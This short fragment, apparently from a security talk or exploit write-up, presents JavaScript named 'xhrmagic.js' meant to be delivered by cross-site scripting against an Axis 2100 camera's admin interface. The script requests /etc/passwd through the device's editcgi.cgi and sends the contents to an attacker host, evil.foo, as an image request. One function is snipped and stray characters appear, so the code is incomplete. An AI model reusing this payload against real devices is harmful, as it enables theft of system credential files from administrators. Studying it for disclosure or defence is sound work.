çSteal passwd when admin
checks logs
¼//
xhrmagic.js . steals Axis 2100 passwd file
// (needs to be used in XSS attack
to make it work)
var req;
var url="/admin-bin/editcgi.cgi?file=/etc/passwd";
function loadXMLDoc(url) { [snip] }
function processReqChange() {
// only if req shows "loaded"
if (req.readyState == 4) {
// only if "OK"
if (req.status == 200) {
// send to attacker
C=new Image();
C.src="http://evil.foo/chivato.php?target="+req.responseText;
}
}
} loadXMLDoc(url);